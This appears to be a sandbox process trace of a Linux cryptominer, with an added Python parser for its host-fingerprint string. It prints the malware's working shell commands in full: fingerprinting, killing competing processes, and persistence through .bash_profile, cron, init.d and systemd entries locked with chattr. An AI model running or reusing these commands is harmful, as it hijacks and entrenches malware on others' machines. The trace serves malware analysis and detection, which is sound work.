    [3] /usr/bin/crontab  crontab -  PID:2087
        - Creates/modifies Cron job
  [2] /tmp/sys-helper  /tmp/sys-helper  PID:2088
      - Executes dropped EXE
      - Writes file to tmp directory
  [2] /tmp/service-agent  /tmp/service-agent -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d -pwn  PID:2089
      - Executes dropped EXE
      - Checks hardware identifiers (DMI)
      - Reads hardware information
      - Checks CPU configuration
      - Reads CPU attributes
      - Enumerates kernel/hardware configuration
    [3] /bin/sh  sh -c "echo \"[\$(hostname=\$(hostname -I 2>/dev/null || hostname -i 2>/dev/null);echo \$hostname | awk {'print \$1'} 2>/dev/null)\$(cat /etc/ssh/sshd_config 2>/dev/null | grep 'Port ' 2>/dev/null | head -n 1 2>/dev/null | awk {'print \"-\"\$2'} 2>/dev/null)][\$(whoami 2>/dev/null)][\$(hostname 2>/dev/null)][\$(grep -c ^processor /proc/cpuinfo 2>/dev/null)][\$(X=\$(grep -m 1 'model name' /proc/cpuinfo 2>/dev/null | cut -d: -f2 2>/dev/null | sed -e 's/^ *//' 2>/dev/null | sed -e 's/\$//' 2>/dev/null); if [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'QEMU' ]; then echo 'QEMU'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Haswell)' ]; then echo 'Haswell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Broadwell)' ]; then echo 'Broadwell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'AMD' ]; then echo \$X 2>/dev/null | awk {'print \$2\" \"\$3\" \"\$4'} 2>/dev/null; else echo \$X 2>/dev/null; fi)]\""  PID:2090
      [4] /usr/bin/hostname  hostname -I  PID:2093
      [4] /usr/bin/awk  awk "{print \$1}"  PID:2095
      [4] /usr/bin/awk  awk "{print \"-\"\$2}"  PID:2100
      [4] /usr/bin/head  head -n 1  PID:2099
      [4] /usr/bin/grep  grep "Port "  PID:2098
      [4] /usr/bin/cat  cat /etc/ssh/sshd_config  PID:2097
      [4] /usr/bin/whoami  whoami  PID:2101
      [4] /usr/bin/hostname  hostname  PID:2102
      [4] /usr/bin/grep  grep -c "^processor" /proc/cpuinfo  PID:2103
          - Checks CPU configuration
      [4] /usr/bin/sed  sed -e "s/\$//"  PID:2109
      [4] /usr/bin/sed  sed -e "s/^ *//"  PID:2108
      [4] /usr/bin/cut  cut -d: -f2  PID:2107
      [4] /usr/bin/grep  grep -m 1 "model name" /proc/cpuinfo  PID:2106
      [4] /usr/bin/awk  awk "{print \$1}"  PID:2112
      [4] /usr/bin/awk  awk "{print \$4}"  PID:2115
      [4] /usr/bin/awk  awk "{print \$4}"  PID:2118
    [3] /bin/sh  sh -c "ps -A -ostat,ppid 2>/dev/null | awk '/[zZ]/ && !a[\$2]++ {print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done;if [ `id -u 2>/dev/null` -eq '0' ]; then ps x 2>/dev/null | grep /etc/cron 2>/dev/null | grep -v grep 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi"  PID:2119
      [4] /usr/bin/awk  awk "/[zZ]/ && !a[\$2]++ {print \$2}"  PID:2121
      [4] /usr/bin/ps  ps -A "-ostat,ppid"  PID:2120
      [4] /usr/bin/id  id -u  PID:2123
      [4] /usr/bin/grep  grep -v grep  PID:2126
      [4] /usr/bin/grep  grep /etc/cron  PID:2125
      [4] /usr/bin/ps  ps x  PID:2124
          - Reads runtime system information
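Each run of /tmp/service-agent in this tree (PIDs 1701, 2001 and 2089) spawns the same `sh -c "echo \"[...][...]...\""` pipeline, which builds a one-line host fingerprint from `hostname -I`, the first `Port ` line of /etc/ssh/sshd_config, whoami, hostname, the processor count and a trimmed `model name` from /proc/cpuinfo. The code below is an added example, not code from the sample or the sandbox: it reproduces the string exactly as that echo composes it, including the awk branch ladder that reduces the CPU model to `QEMU`, a microarchitecture code name, a model number or the AMD model words, and parses such a string back into fields so it can be matched in captured traffic. All inputs are constructed stand-ins; what the parent does with the string is not shown in this section.

```python
"""Rebuild and parse the [ip-port][user][host][ncpu][cpu] host fingerprint
that the `sh -c "echo ..."` child of /tmp/service-agent assembles in the
trace. Added example, not code from the sample or the sandbox; all inputs
below are constructed stand-ins for `hostname -I`, /etc/ssh/sshd_config,
whoami, hostname and /proc/cpuinfo.
"""
import re


def _field(words, i):
    """awk $i on a whitespace-split line: empty string when the field is absent."""
    return words[i - 1] if len(words) >= i else ""


def classify_cpu(model_name):
    """The awk branch ladder from the trace, applied to the 'model name' value."""
    w = model_name.split()              # unquoted `echo $X` collapses whitespace
    if _field(w, 1) == "QEMU":
        return "QEMU"
    if _field(w, 4) == "(Haswell)":
        return "Haswell"
    if _field(w, 4) == "(Broadwell)":
        return "Broadwell"
    if _field(w, 3) == "CPU":           # "Intel(R) Xeon(R) CPU E5-2680 v3 ..." -> E5-2680
        return _field(w, 4)
    if _field(w, 4) == "CPU":           # "Intel(R) Core(TM) i7-4770 CPU ..." -> i7-4770
        return _field(w, 3)
    if _field(w, 1) == "AMD":           # "AMD EPYC 7401P 24-Core Processor" -> EPYC 7401P 24-Core
        return " ".join(_field(w, i) for i in (2, 3, 4))
    return " ".join(w)


def ssh_port_suffix(sshd_config):
    """`grep 'Port ' | head -n 1 | awk '{print "-"$2}'`: the first line that
    contains 'Port ' (a commented '#Port 22' counts) yields '-22'; no such
    line yields '' because awk never sees any input."""
    for line in sshd_config.splitlines():
        if "Port " in line:
            return "-" + _field(line.split(), 2)
    return ""


def build_fingerprint(hostname_i, sshd_config, user, host, cpuinfo):
    """[ip-port][user][host][ncpu][cpu], composed as the echo in the trace does."""
    lines = cpuinfo.splitlines()
    ncpu = sum(1 for l in lines if l.startswith("processor"))           # grep -c ^processor
    model = next((l.split(":", 1)[1] for l in lines if "model name" in l and ":" in l), "")
    return "[%s%s][%s][%s][%d][%s]" % (
        _field(hostname_i.split(), 1), ssh_port_suffix(sshd_config),   # first address from hostname -I
        user, host, ncpu, classify_cpu(model))


FP_RE = re.compile(r"^\[([^\]]*)\]\[([^\]]*)\]\[([^\]]*)\]\[([^\]]*)\]\[([^\]]*)\]$")


def parse_fingerprint(s):
    """Split a fingerprint back into its fields; None if it does not match."""
    m = FP_RE.match(s.strip())
    if not m:
        return None
    addr, user, host, ncpu, cpu = m.groups()
    ip, _, port = addr.partition("-")
    return {"ip": ip, "ssh_port": port, "user": user, "host": host,
            "ncpu": int(ncpu) if ncpu.isdigit() else None, "cpu": cpu}


# Constructed inputs resembling a two-vCPU QEMU guest with a default sshd_config.
CPUINFO = ("processor\t: 0\nmodel name\t: QEMU Virtual CPU version 2.5+\n"
           "processor\t: 1\nmodel name\t: QEMU Virtual CPU version 2.5+\n")
SSHD_CONFIG = "# sshd_config\n#Port 22\nPermitRootLogin yes\n"

if __name__ == "__main__":
    fp = build_fingerprint("10.0.2.15 fe80::1", SSHD_CONFIG, "root", "sandbox", CPUINFO)
    print(fp)
    print(parse_fingerprint(fp))
```

The `QEMU` branch sitting first in the ladder means the operator learns from the very first field of the CPU description whether the host is a virtual machine, and the sshd port is read from the config file rather than from a listening socket, so a commented-out `#Port 22` still reports 22. `FP_RE` matches the five bracketed fields as a whole line, which is the shape to search for when the string shows up in a capture.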
    /bin/sh: sh -c "if [ `id -u 2>/dev/null` -eq '0' ]; then SNIFFDIR='/bin';PWNDIR='/bin'; else rm -rf /tmp/.pwn 2>/dev/null;mkdir /tmp/.pwn 2>/dev/null;SNIFFDIR='/tmp/.pwn';PWNDIR='/tmp';fi;PWNRIG='pwnrig';PWNRIGE='pwnrige';PWNRIGL='pwnrigl';CROND='crondr';SYSD='sysdr';INITD='initdr';BPROFILE='bprofr';MINER='/tmp/service-agent';PROGRAM='-bash';if [ `id -u 2>/dev/null` -eq '0' ]; then chattr -i -a \$SNIFFDIR/\$BPROFILE ~/.bash_profile >/dev/null 2>&1;fi;rm -rf \$SNIFFDIR/\$BPROFILE 2>/dev/null;sed -i \"/\$BPROFILE/d\" ~/.bash_profile 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$BPROFILE 2>/dev/null;echo \"cp -f -r -- \$SNIFFDIR/\$BPROFILE \$PWNDIR/\$PROGRAM 2>/dev/null && \$PWNDIR/\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d >/dev/null 2>&1 && rm -rf -- \$PWNDIR/\$PROGRAM 2>/dev/null\" >> ~/.bash_profile 2>/dev/null;if [ `id -u 2>/dev/null` -eq '0' ]; then chattr +i +a \$SNIFFDIR/\$BPROFILE ~/.bash_profile >/dev/null 2>&1;mkdir -p /etc/cron.d /etc/cron.daily /etc/cron.hourly /etc/cron.monthly /etc/cron.weekly 2>/dev/null;chattr -i -a /etc/cron.*/\$PWNRIG \$SNIFFDIR/\$CROND >/dev/null 2>&1;rm -rf \$SNIFFDIR/\$CROND 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$CROND 2>/dev/null;echo -e \"#!/bin/bash\\ncp -f -r -- \$SNIFFDIR/\$CROND \$PWNDIR/\$PROGRAM 2>/dev/null\\ncd \$PWNDIR 2>/dev/null\\n./\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d >/dev/null 2>&1\\nrm -rf -- \$PROGRAM 2>/dev/null\\n\" | tee /etc/cron.d/\$PWNRIG /etc/cron.daily/\$PWNRIG /etc/cron.hourly/\$PWNRIG /etc/cron.monthly/\$PWNRIG /etc/cron.weekly/\$PWNRIG > /dev/null;sed -i '1 s/-e //' /etc/cron.*/\$PWNRIG 2>/dev/null;chmod +x /etc/cron.*/\$PWNRIG \$SNIFFDIR/\$CROND 2>/dev/null;chattr +i +a /etc/cron.*/\$PWNRIG \$SNIFFDIR/\$CROND >/dev/null 2>&1;if which chkconfig > /dev/null 2>&1; then chattr -i -a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;chkconfig \$PWNRIG off 2>/dev/null;chkconfig --del \$PWNRIG 2>/dev/null;rm -rf \$SNIFFDIR/\$INITD 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$INITD 2>/dev/null;echo -e \"#!/bin/bash\\n#\\n# \$PWNRIG Start/Stop the \$PWNRIG clock daemon.\\n#\\n# chkconfig: 2345 90 60\\n# description: \$PWNRIG (by pwned)\\ncp -f -r -- \$SNIFFDIR/\$INITD \$PWNDIR/\$PROGRAM 2>/dev/null\\ncd \$PWNDIR 2>/dev/null\\n./\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d 2>/dev/null\\nrm -rf -- \$PROGRAM 2>/dev/null\\n\" | tee /etc/init.d/\$PWNRIG > /dev/null;sed -i '1 s/-e //' /etc/init.d/\$PWNRIG 2>/dev/null;chmod +x /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD 2>/dev/null;chkconfig --add \$PWNRIG 2>/dev/null;chkconfig \$PWNRIG on 2>/dev/null;chattr +i +a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;fi;if which update-rc.d > /dev/null 2>&1; then chattr -i -a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;update-rc.d -f \$PWNRIG disable >/dev/null 2>&1;update-rc.d -f \$PWNRIG remove >/dev/null 2>&1;rm -rf \$SNIFFDIR/\$INITD 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$INITD 2>/dev/null;echo -e \"#!/bin/bash\\n### BEGIN INIT INFO\\n# Provides: \$PWNRIG\\n# Required-Start: \$all\\n# Required-Stop:\\n# Default-Start: 2 3 4 5\\n# Default-Stop:\\n# Short-Description: \$PWNRIG (by pwned)\\n### END INIT INFO\\ncp -f -r -- \$SNIFFDIR/\$INITD \$PWNDIR/\$PROGRAM 2>/dev/null\\ncd \$PWNDIR 2>/dev/null\\n./\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d 2>/dev/null\\nrm -rf -- \$PROGRAM 2>/dev/null\\n\" | tee /etc/init.d/\$PWNRIG > /dev/null;sed -i '1 s/-e //' /etc/init.d/\$PWNRIG 2>/dev/null;chmod +x /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD 2>/dev/null;update-rc.d \$PWNRIG defaults >/dev/null 2>&1;update-rc.d \$PWNRIG enable >/dev/null 2>&1;chattr +i +a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;fi;if which systemctl > /dev/null 2>&1; then chattr -i -a /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service \$SNIFFDIR/\$SYSD >/dev/null 2>&1;rm -rf \$SNIFFDIR/\$SYSD 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$SYSD 2>/dev/null;echo -e \"[Unit]\\nDescription=\$PWNRIG\\n\\nWants=network.target\\nAfter=syslog.target network-online.target\\n\\n[Service]\\nType=forking\\nExecStart=/bin/bash -c 'cp -f -r -- \$SNIFFDIR/\$SYSD \$PWNDIR/\$PROGRAM 2>/dev/null && \$PWNDIR/\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d >/dev/null 2>&1 && rm -rf -- \$PWNDIR/\$PROGRAM 2>/dev/null'\\nRestart=always\\nKillMode=process\\n\\n[Install]\\nWantedBy=multi-user.target\" | tee /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service >/dev/null;sed -i '1 s/-e //' /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service 2>/dev/null;chattr +i +a /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service \$SNIFFDIR/\$SYSD >/dev/null 2>&1;systemctl enable \$PWNRIGE.service 2> /dev/null;systemctl enable \$PWNRIGL.service 2> /dev/null;systemctl daemon-reload 2> /dev/null;systemctl reload-or-restart \$PWNRIGE.service 2> /dev/null;systemctl reload-or-restart \$PWNRIGL.service 2> /dev/null;fi;fi" [PID:2128]
      - File and Directory Permissions Modification
      - Writes file to tmp directory
        /usr/bin/id: id -u [PID:2129]
        /usr/bin/id: id -u [PID:2130]
        /usr/bin/chattr: chattr -i -a /bin/bprofr "~/.bash_profile" [PID:2131]
        /usr/bin/rm: rm -rf /bin/bprofr [PID:2132]
        /usr/bin/sed: sed -i /bprofr/d "~/.bash_profile" [PID:2133]
        /usr/bin/cp: cp -f -r -- /tmp/service-agent /bin/bprofr [PID:2134]
          - Writes file to system bin folder
        /usr/bin/id: id -u [PID:2135]
        /usr/bin/chattr: chattr +i +a /bin/bprofr "~/.bash_profile" [PID:2136]
        /usr/bin/mkdir: mkdir -p /etc/cron.d /etc/cron.daily /etc/cron.hourly /etc/cron.monthly /etc/cron.weekly [PID:2137]
        /usr/bin/chattr: chattr -i -a /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig /bin/crondr [PID:2138]
        /usr/bin/rm: rm -rf /bin/crondr [PID:2139]
        /usr/bin/cp: cp -f -r -- /tmp/service-agent /bin/crondr [PID:2140]
          - Writes file to system bin folder
        /usr/bin/tee: tee /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig [PID:2142]
          - Creates/modifies Cron job
        /usr/bin/sed: sed -i "1 s/-e //" /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig [PID:2143]
          - Attempts to change immutable files
          - Creates/modifies Cron job
        /usr/bin/chmod: chmod +x /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig /bin/crondr [PID:2144]
          - File and Directory Permissions Modification
        /usr/bin/chattr: chattr +i +a /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig /bin/crondr [PID:2145]
        /usr/bin/which: which chkconfig [PID:2146]
        /usr/bin/which: which update-rc.d [PID:2147]
        /usr/bin/chattr: chattr -i -a /etc/init.d/pwnrig /bin/initdr [PID:2148]
          - Attempts to change immutable files
        /usr/sbin/update-rc.d: update-rc.d -f pwnrig disable [PID:2149]
          - Flushes firewall rules
            /usr/local/sbin/systemctl: systemctl --quiet disable pwnrig [PID:2150]
            /usr/local/bin/systemctl: systemctl --quiet disable pwnrig [PID:2150]
            /usr/sbin/systemctl: systemctl --quiet disable pwnrig [PID:2150]
            /usr/bin/systemctl: systemctl --quiet disable pwnrig [PID:2150]
              - Reads EFI boot settings
            /usr/local/sbin/systemctl: systemctl daemon-reload [PID:2176]
            /usr/local/bin/systemctl: systemctl daemon-reload [PID:2176]
            /usr/sbin/systemctl: systemctl daemon-reload [PID:2176]
            /usr/bin/systemctl: systemctl daemon-reload [PID:2176]
              - Reads EFI boot settings
        /usr/sbin/update-rc.d: update-rc.d -f pwnrig remove [PID:2202]
            /usr/local/sbin/systemctl: systemctl daemon-reload [PID:2203]
            /usr/local/bin/systemctl: systemctl daemon-reload [PID:2203]
            /usr/sbin/systemctl: systemctl daemon-reload [PID:2203]
            /usr/bin/systemctl: systemctl daemon-reload [PID:2203]
              - Reads EFI boot settings
        /usr/bin/rm: rm -rf /bin/initdr [PID:2229]
        /usr/bin/cp: cp -f -r -- /tmp/service-agent /bin/initdr [PID:2230]
          - Writes file to system bin folder
        /usr/bin/tee: tee /etc/init.d/pwnrig [PID:2232]
          - Modifies init.d
        /usr/bin/sed: sed -i "1 s/-e //" /etc/init.d/pwnrig [PID:2233]
          - Modifies init.d
        /usr/bin/chmod: chmod +x /etc/init.d/pwnrig /bin/initdr [PID:2234]
          - File and Directory Permissions Modification
        /usr/sbin/update-rc.d: update-rc.d pwnrig defaults [PID:2235]
            /usr/local/sbin/systemctl: systemctl daemon-reload [PID:2236]
            /usr/local/bin/systemctl: systemctl daemon-reload [PID:2236]
            /usr/sbin/systemctl: systemctl daemon-reload [PID:2236]
            /usr/bin/systemctl: systemctl daemon-reload [PID:2236]
        /usr/sbin/update-rc.d: update-rc.d pwnrig enable [PID:2262]
            /usr/local/sbin/systemctl: systemctl --quiet enable pwnrig [PID:2263]
            /usr/local/bin/systemctl: systemctl --quiet enable pwnrig [PID:2263]
            /usr/sbin/systemctl: systemctl --quiet enable pwnrig [PID:2263]
            /usr/bin/systemctl: systemctl --quiet enable pwnrig [PID:2263]
            /usr/local/sbin/systemctl: systemctl daemon-reload [PID:2264]
            /usr/local/bin/systemctl: systemctl daemon-reload [PID:2264]
            /usr/sbin/systemctl: systemctl daemon-reload [PID:2264]
            /usr/bin/systemctl: systemctl daemon-reload [PID:2264]
        /usr/bin/chattr: chattr +i +a /etc/init.d/pwnrig /bin/initdr [PID:2290]
        /usr/bin/which: which systemctl [PID:2291]
        /usr/bin/chattr: chattr -i -a /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service /bin/sysdr [PID:2292]
        /usr/bin/rm: rm -rf /bin/sysdr [PID:2293]
        /usr/bin/cp: cp -f -r -- /tmp/service-agent /bin/sysdr [PID:2294]
          - Writes file to system bin folder
        /usr/bin/tee: tee /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service [PID:2296]
          - Modifies systemd
        /usr/bin/sed: sed -i "1 s/-e //" /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service [PID:2297]
        /usr/bin/chattr: chattr +i +a /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service /bin/sysdr [PID:2298]
        /usr/bin/systemctl: systemctl enable pwnrige.service [PID:2299]
        /usr/bin/systemctl: systemctl enable pwnrigl.service [PID:2325]
        /usr/bin/systemctl: systemctl daemon-reload [PID:2351]
        /usr/bin/systemctl: systemctl reload-or-restart pwnrige.service [PID:2377]
/tmp/service-agent: /tmp/service-agent -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d [PID:2434]
  - Executes dropped EXE
  - Checks hardware identifiers (DMI)
  - Reads hardware information
  - Checks CPU configuration
  - Reads CPU attributes
  - Enumerates kernel/hardware configuration
  - Writes file to tmp directory
    /bin/sh: sh -c "echo \"[\$(hostname=\$(hostname -I 2>/dev/null || hostname -i 2>/dev/null);echo \$hostname | awk {'print \$1'} 2>/dev/null)\$(cat /etc/ssh/sshd_config 2>/dev/null | grep 'Port ' 2>/dev/null | head -n 1 2>/dev/null | awk {'print \"-\"\$2'} 2>/dev/null)][\$(whoami 2>/dev/null)][\$(hostname 2>/dev/null)][\$(grep -c ^processor /proc/cpuinfo 2>/dev/null)][\$(X=\$(grep -m 1 'model name' /proc/cpuinfo 2>/dev/null | cut -d: -f2 2>/dev/null | sed -e 's/^ *//' 2>/dev/null | sed -e 's/\$//' 2>/dev/null); if [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'QEMU' ]; then echo 'QEMU'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Haswell)' ]; then echo 'Haswell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Broadwell)' ]; then echo 'Broadwell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'AMD' ]; then echo \$X 2>/dev/null | awk {'print \$2\" \"\$3\" \"\$4'} 2>/dev/null; else echo \$X 2>/dev/null; fi)]\"" [PID:2458]
        /usr/bin/hostname: hostname -I [PID:2461]
        /usr/bin/awk: awk "{print \$1}" [PID:2463]
        /usr/bin/awk: awk "{print \"-\"\$2}" [PID:2468]
        /usr/bin/head: head -n 1 [PID:2467]
        /usr/bin/grep: grep "Port " [PID:2466]
        /usr/bin/cat: cat /etc/ssh/sshd_config [PID:2465]
        /usr/bin/whoami: whoami [PID:2469]
        /usr/bin/hostname: hostname [PID:2470]
        /usr/bin/grep: grep -c "^processor" /proc/cpuinfo [PID:2471]
          - Checks CPU configuration
        /usr/bin/sed: sed -e "s/\$//" [PID:2477]
        /usr/bin/sed: sed -e "s/^ *//" [PID:2476]
        /usr/bin/cut: cut -d: -f2 [PID:2475]
        /usr/bin/grep: grep -m 1 "model name" /proc/cpuinfo [PID:2474]
        /usr/bin/awk: awk "{print \$1}" [PID:2480]
        /usr/bin/awk: awk "{print \$4}" [PID:2483]
        /usr/bin/awk: awk "{print \$4}" [PID:2486]
    /bin/sh: sh -c "ps -A -ostat,ppid 2>/dev/null | awk '/[zZ]/ && !a[\$2]++ {print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done;if [ `id -u 2>/dev/null` -eq '0' ]; then ps x 2>/dev/null | grep /etc/cron 2>/dev/null | grep -v grep 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi" [PID:2487]
        /usr/bin/awk: awk "/[zZ]/ && !a[\$2]++ {print \$2}" [PID:2489]
        /usr/bin/ps: ps -A "-ostat,ppid" [PID:2488]
        /usr/bin/id: id -u [PID:2491]
        /usr/bin/grep: grep -v grep [PID:2494]
        /usr/bin/grep: grep /etc/cron [PID:2493]
        /usr/bin/ps: ps x [PID:2492]
    /bin/sh: sh -c "if [ `id -u 2>/dev/null` -eq '0' ]; then ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -v -- '-bash[[:space:]]*\$' 2>/dev/null | grep -v /usr/sbin/httpd 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done else ps -u `whoami 2>/dev/null` ux | grep -v grep 2>/dev/null | grep -v -- '-bash[[:space:]]*\$' 2>/dev/null | grep -v /usr/sbin/httpd 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi" [PID:2496]
      - Security Software Discovery
        /usr/bin/id: id -u [PID:2497]
        /usr/bin/awk: awk "{if(\$3>30.0) print \$2}" [PID:2502]
        /usr/bin/grep: grep -v /usr/sbin/httpd [PID:2501]
        /usr/bin/grep: grep -v -- "-bash[[:space:]]*\$" [PID:2500]
        /usr/bin/grep: grep -v grep [PID:2499]
        /usr/bin/ps: ps aux [PID:2498]
          - Process Discovery
          - Reads runtime system information
    /bin/sh: sh -c "if [ `id -u 2>/dev/null` -eq '0' ]; then if [ `ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | wc -l 2>/dev/null` -gt 1 ]; then ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi else myid=`whoami 2>/dev/null`; if [ `ps -u \$myid ux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | wc -l 2>/dev/null` -gt 1 ]; then ps -u \$myid ux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi fi" [PID:2504]
      - Security Software Discovery
        /usr/bin/id: id -u [PID:2505]
        /usr/bin/wc: wc -l [PID:2511]
        /usr/bin/awk: awk "{if(\$3>30.0) print \$2}" [PID:2510]
        /usr/bin/grep: grep -- "-bash[[:space:]]*\$" [PID:2509]
        /usr/bin/grep: grep -v grep [PID:2508]
        /usr/bin/ps: ps aux [PID:2507]
          - Process Discovery
/usr/bin/crontab: crontab -r [PID:2513]
/usr/bin/pkill: pkill -f .klibsystem5 [PID:2514]
/usr/bin/pkill: pkill -f .klibsystem4 [PID:2515]
  - Reads runtime system information
/usr/bin/bash: bash -c "echo \"* * * * * /home/.klibsystem5 >/dev/null 2>&1\" | crontab -" [PID:2516]
    /usr/bin/crontab: crontab - [PID:2518]
/usr/bin/chattr: chattr -ia /etc/cron.d/.lib-knlib4 [PID:2519]
/usr/bin/chattr: chattr +ia /etc/cron.d/.lib-knlib4 [PID:2520]
/usr/bin/chattr: chattr -ia /var/spool/cron/.lib-knlib4 [PID:2521]
/usr/bin/chattr: chattr +ia /var/spool/cron/.lib-knlib4 [PID:2522]
/usr/bin/chattr: chattr -ia /etc/cron.hourly/.lib-knlib4 [PID:2523]
/usr/bin/chattr: chattr +ia /etc/cron.hourly/.lib-knlib4 [PID:2524]
/usr/bin/chattr: chattr -ia /etc/cron.daily/.lib-knlib4 [PID:2525]
/usr/bin/chattr: chattr +ia /etc/cron.daily/.lib-knlib4 [PID:2526]
/usr/bin/chattr: chattr -ia /etc/cron.weekly/.lib-knlib4 [PID:2527]
/usr/bin/chattr: chattr +ia /etc/cron.weekly/.lib-knlib4 [PID:2528]
/usr/bin/chattr: chattr -ia /etc/cron.monthly/.lib-knlib4 [PID:2529]
  - Attempts to change immutable files
/usr/bin/chattr: chattr +ia /etc/cron.monthly/.lib-knlib4 [PID:2530]
/usr/bin/chattr: chattr -ia /etc/anacrontab [PID:2531]
/usr/bin/chattr: chattr +ia /etc/anacrontab [PID:2532]
/tmp/sys-helper: /tmp/sys-helper [PID:2533]
  - Executes dropped EXE
  - Writes file to tmp directory
/tmp/service-agent: /tmp/service-agent -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d -pwn [PID:2534]
  - Executes dropped EXE
  - Checks hardware identifiers (DMI)
  - Reads hardware information
  - Checks CPU configuration
  - Reads CPU attributes
  - Enumerates kernel/hardware configuration
